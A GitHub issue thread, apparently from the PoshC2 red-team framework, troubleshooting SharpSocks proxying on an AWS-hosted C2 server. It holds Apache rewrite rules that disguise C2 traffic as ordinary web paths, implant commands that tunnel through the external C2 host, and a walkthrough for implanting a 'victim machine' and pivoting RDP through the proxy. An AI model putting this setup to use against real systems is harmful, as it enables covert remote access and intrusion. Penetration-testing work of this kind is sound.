benpturner
commented
6 years ago Can you provide an obfuscated screenshot of the PoshC2 instance, or are you running this directly with the SharpSocks ps1?
Closed r0b1nv4np closed 6 years ago
benpturner
commented
6 years ago Can you provide an obfuscated screenshot of the PoshC2 instance, or are you running this directly with the SharpSocks ps1?
benpturner
commented
6 years ago It looks as though you have the SharpSocks server on http://172.*.*.*:8080 but in the Apache Rewrite rules you are not forwarding back to port 8080?
r0b1nv4np
commented
6 years ago Thank you for your response.
To clarify, I am running this from directly within PoshC2 Implant as shown in the video.
To your comment:
It looks as though you have the SharpSocks server on http://172.*.*.*:8080 but in the Apache Rewrite rules you are not forwarding back to port 8080?
I am unclear as to what I am doing wrong. To be honest, I haven't really messed around with rewrite rules before.
Here is the detailed log as requested from start to finish:
Just to clarify:
ec2-*.compute.amazonaws.com is external hostname of amazon instance 172...170 is the internal IP of the amazon instance. When I start the C2 server, it opens port 80 accessible externally but does not open port 8080. Am I missing a firewall rule? My admin may have allowed only 80,443 to be accessible externally.
Server Options:
IP found: 172.*.*.170
[1] Enter the IP address or Hostname of the Posh C2 server (External address if using NAT) [172.*.*.170]: ec2-*.compute.amazonaws.com
[2] Do you want to use HTTPS for implant comms? [Yes]: No
[3a] Do you want to customize the beacon URLs from the default? [No]: No
[3b] Do you want to customize the beacon URLs from the Socks Proxy (SharpSocks)? [No]: No
[4] Do you want to customize the default UserAgent? [No]:
[5] Enter a new folder name for this project [PoshC2-2017-27-11-0802]: teesting
[6] Enter the default beacon time of the Posh C2 Server - 30s, 5m, 1h (10% jitter is always applied) [5s]:
[7] Enter the auto Kill Date of the implants in this format dd/MM/yyyy [11/12/2017]:
[8] Enter the HTTP port you want to use, 80/443 is highly preferable for proxying [80]:
[9] Do you want to enable sound? [Yes]:
[10] Do you want to use Clockwork SMS for new payloads? [No]:
[11] Do you want all payloads or select limited payloads that shouldnt be caught by AV? [Yes]:Default Apache.conf generated
RewriteEngine On
Define PoshC2 <ADD_IPADDRESS_HERE>
Define SharpSocks <ADD_IPADDRESS_HERE>
RewriteRule ^/connect(.*) http://${PoshC2}/connect$1 [NC,P]
RewriteRule ^/images/static/content/(.*) http://${PoshC2}/images/static/content/$1 [NC,P]
RewriteRule ^/news/(.*) http://${PoshC2}/news/$1 [NC,P]
RewriteRule ^/webapp/static/(.*) http://${PoshC2}/webapp/static/$1 [NC,P]
RewriteRule ^/images/prints/(.*) http://${PoshC2}/images/prints/$1 [NC,P]
RewriteRule ^/wordpress/site/(.*) http://${PoshC2}/wordpress/site/$1 [NC,P]
RewriteRule ^/true/images/77/(.*) http://${PoshC2}/true/images/77/$1 [NC,P]
RewriteRule ^/holdings/office/images/(.*) http://${PoshC2}/holdings/office/images/$1 [NC,P]
RewriteRule ^/steam(.*) http://${PoshC2}/steam$1 [NC,P]
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}/visitors/upload/map$1 [NC,P]
RewriteRule ^/printing/images/bin/logo(.*) http://${SharpSocks}/printing/images/bin/logo$1 [NC,P]
RewriteRule ^/update/latest/traffic(.*) http://${SharpSocks}/update/latest/traffic$1 [NC,P]
RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}/saml/stats/update/push$1 [NC,P]
Changes made to default Apache.conf (Defined addresses. Added :8080 to SharpSocks Rule Lines
RewriteEngine On
Define PoshC2 ec2-*.compute.amazonaws.com
Define SharpSocks 172.*.*.170
RewriteRule ^/connect(.*) http://${PoshC2}/connect$1 [NC,P]
RewriteRule ^/images/static/content/(.*) http://${PoshC2}/images/static/content/$1 [NC,P]
RewriteRule ^/news/(.*) http://${PoshC2}/news/$1 [NC,P]
RewriteRule ^/webapp/static/(.*) http://${PoshC2}/webapp/static/$1 [NC,P]
RewriteRule ^/images/prints/(.*) http://${PoshC2}/images/prints/$1 [NC,P]
RewriteRule ^/wordpress/site/(.*) http://${PoshC2}/wordpress/site/$1 [NC,P]
RewriteRule ^/true/images/77/(.*) http://${PoshC2}/true/images/77/$1 [NC,P]
RewriteRule ^/holdings/office/images/(.*) http://${PoshC2}/holdings/office/images/$1 [NC,P]
RewriteRule ^/steam(.*) http://${PoshC2}/steam$1 [NC,P]
RewriteRule ^/sitemap/api/push(.*) http://${SharpSocks}:8080/sitemap/api/push$1 [NC,P]
RewriteRule ^/visitors/upload/map(.*) http://${SharpSocks}:8080/visitors/upload/map$1 [NC,P]
RewriteRule ^/printing/images/bin/logo(.*) http://${SharpSocks}:8080/printing/images/bin/logo$1 [NC,P]
RewriteRule ^/update/latest/traffic(.*) http://${SharpSocks}:8080/update/latest/traffic$1 [NC,P]
RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}:8080/saml/stats/update/push$1 [NC,P]Successful connect back from implant
New host connected: (uri=<uri>, key=<key>)
*.*.*.*:44526 | URL:http://ec2-*.compute.amazonaws.om | Time:11/27/2017 08:09:01 | PID:8404 | Sleep:5 | <hostname> <username>SharpSocks options from within the implant handler
Select ImplantID or ALL or Comma Separated List (Enter to refresh):: 1
PS 1>: SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure
Local IP Address to bind to, e.g. http://172.16.0.1:80: http://172.*.*.170:8080
PS 1>:SharpSocks console log
Command returned against host: <hostname> <username> (2017-11-27 08:12:53)
64bit implant running on 64bit machine
[+] Powershell version 5 detected. Run Invoke-DowngradeAttack to try using PS v2
Command returned against host: <hostname> <username> (2017-11-27 08:12:53)
Command issued against host: <hostname>
SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure -Client -Channel <channel> -Key <key> -URLs "sitemap/api/push","visitors/upload/map","
printing/images/bin/logo","update/latest/traffic","saml/stats/update/push"
Command returned against host: <hostname> <username> (2017-11-27 08:13:31)
Loading Client Assembly
[+] SharpSocks client Started!
URLs:
http://ec2-*.compute.amazonaws.com/sitemap/api/push
http://ec2-*.compute.amazonaws.com/visitors/upload/map
http://ec2-*.compute.amazonaws.com/printing/images/bin/logo
http://ec2-*.compute.amazonaws.com/update/latest/traffic
http://ec2-*.compute.amazonaws.com/saml/stats/update/push
Channel: s<channel>
Key being used: <key>
Beacon: 2000
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/60.0.3112.78 Safari/537.36
[-] Run StopSocks to stop the client!Secondary Console Log for SharpSocks
Loading Server Assembly
[11/27/2017 8:13:27 AM][!] Public key for USING DEBUG SIMPLE ENCRYPTOR
[11/27/2017 8:13:27 AM][!] C2 HTTP processor listening on http://172.*.*.170:8
080/
[11/27/2017 8:13:27 AM][!] Wait for Implant TCP Connect before SOCKS Proxy respo
nse is on
[+] SharpSocks server started!
Channel: <channel>
Key being used: <key>
Cookies: ASP.NET_SessionId __RequestVerificationToken
[-] Run StopSocks to stop the server!
[11/27/2017 8:13:27 AM][!] Waiting for command channel before starting SOCKS pro
xyThank you for sticking with me on this. I can provide more information if you require it.
benpturner
commented
6 years ago Thanks for the thorough logs, it looks as though there may an issue with comms on your C2 proxy setup. Could you login to the VPS and check you can see port 8080 where the socks server is, e.g. can you curl to http://${SharpSocks}:8080/sitemap/api/push for example. Otherwise it could be a firewall issue
benpturner
commented
6 years ago Everything else looks perfectly setup, if you only have 443 enabled you could try running socks over port 443 instead of 8080 even though you may want to keep it as HTTP not HTTPS, e.g http://172.*.*.*:443 in the rewrite rules
benpturner
commented
6 years ago PS 1>: SharpSocks -Uri http://ec2-*.compute.amazonaws.com:80 -Beacon 2000 -Insecure Local IP Address to bind to, e.g. http://172.16.0.1:80: http://172.*.*.170:443
And change the Apache ReWrite to be RewriteRule ^/sitemap/api/push(.) http://${SharpSocks}:443/sitemap/api/push$1 [NC,P] RewriteRule ^/visitors/upload/map(.) http://${SharpSocks}:443/visitors/upload/map$1 [NC,P] RewriteRule ^/printing/images/bin/logo(.) http://${SharpSocks}:443/printing/images/bin/logo$1 [NC,P] RewriteRule ^/update/latest/traffic(.) http://${SharpSocks}:443/update/latest/traffic$1 [NC,P] RewriteRule ^/saml/stats/update/push(.*) http://${SharpSocks}:443/saml/stats/update/push$1 [NC,P]
benpturner
commented
6 years ago One final comment, can you tail the log from the apache server, e.g. tail -f /var/log/apache2/access.log and send the details of this after the connection is started, however, if port 8080 is blocked by the firewall it may not show this up here
r0b1nv4np
commented
6 years ago Sorry for the late response but I got this working with the helpful hint of using port 443.
I ditched the whole apache rewrite rules as i could not get apache and poshc2 working on a single instance. I am sure it can be done and I'll mess with it when I have the time.
So basically for anyone who reads this and is trying to setup POSHC2 on the cloud say amazon.
Setup your POSHC2 and set the server options. Make sure to use the hostname of your amazon instance. (Though external IP will work, but some proxies don't allow IP addresses in URLs)
Start an implant on the victim machine using any of the options
Now, on your poshc2 server, setup sharpsocks from the implant handler as follows:
sharpsocks -URI http:// <hostname-of-amazon-instance>:<port-accessible-from-internet> -Beacon 2000 -Insecure (I used 443 as pointed out by @benpturner )
http:// local-ip-of-amazoninstance:same-port-as-aboveThe port in steps 3 and 4 have to be the same and should be internet accessible if you are not using apache ! This is the key solution to the issue I was having
[+] SharpSocks client Started!
URLs:
http://ec2-*.compute.amazonaws.com/sitemap/api/push
http://ec2-*.compute.amazonaws.com/visitors/upload/map
http://ec2-*.compute.amazonaws.com/printing/images/bin/logo
http://ec2-*.compute.amazonaws.com/update/latest/traffic
http://ec2-*.compute.amazonaws.com/saml/stats/update/push
Channel: s<channel>
Key being used: <key>
Beacon: 2000
Cookies: ASP.NET_SessionId __RequestVerificationToken
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/60.0.3112.78 Safari/537.36
[-] Run StopSocks to stop the client!
socks proxy listening started on 0.0.0.0:43334
Now download and install proxycap.
Create a socks4 proxy to "local-ip-of-amazon-instance" and Port 43334 (or whatever port is specified in the powershell window for your sharpsocks server console)
Allow mstsc.exe to connect through the proxy you just setup.
Start your rdp session !
@benpturner I have noticed an error while attempting to stopsocks from the server console.
C:\> stopsocks
You cannot call a method on a null-valued expression.
At C:\PowershellC2\Modules\SharpSocks.ps1:171 char:9
+ $Script:BoolStart = $Socks.Stop()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\PowershellC2\Modules\SharpSocks.ps1:172 char:9
+ $Script:BoolStart = $Socks.HARDStop()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
[-] SharpSocks stopped!
Maybe I can create a new issue for the above?
Thanks for all the help.
benpturner
commented
6 years ago This should be all working now.
(Disclaimer: I may be messing up here)
I was testing SharpSocks and I seem to have run into issues and I'd like a little clarity on what I am doing wrong.
I am testing Posh on amazon. I am testing against an internal Windows 10 machine.
I am using http transport.
The implant works fine when connecting to http://ec2-*.amazonaws.com
I rewrote the apache conf as follows
Here is a sample of my apache.conf
The above didn't work. I have tried a few other options but they all didn't work.
Please let me know what I am doing wrong. Would be great to have some insight into how to set this up for testing in the cloud.
Thank you.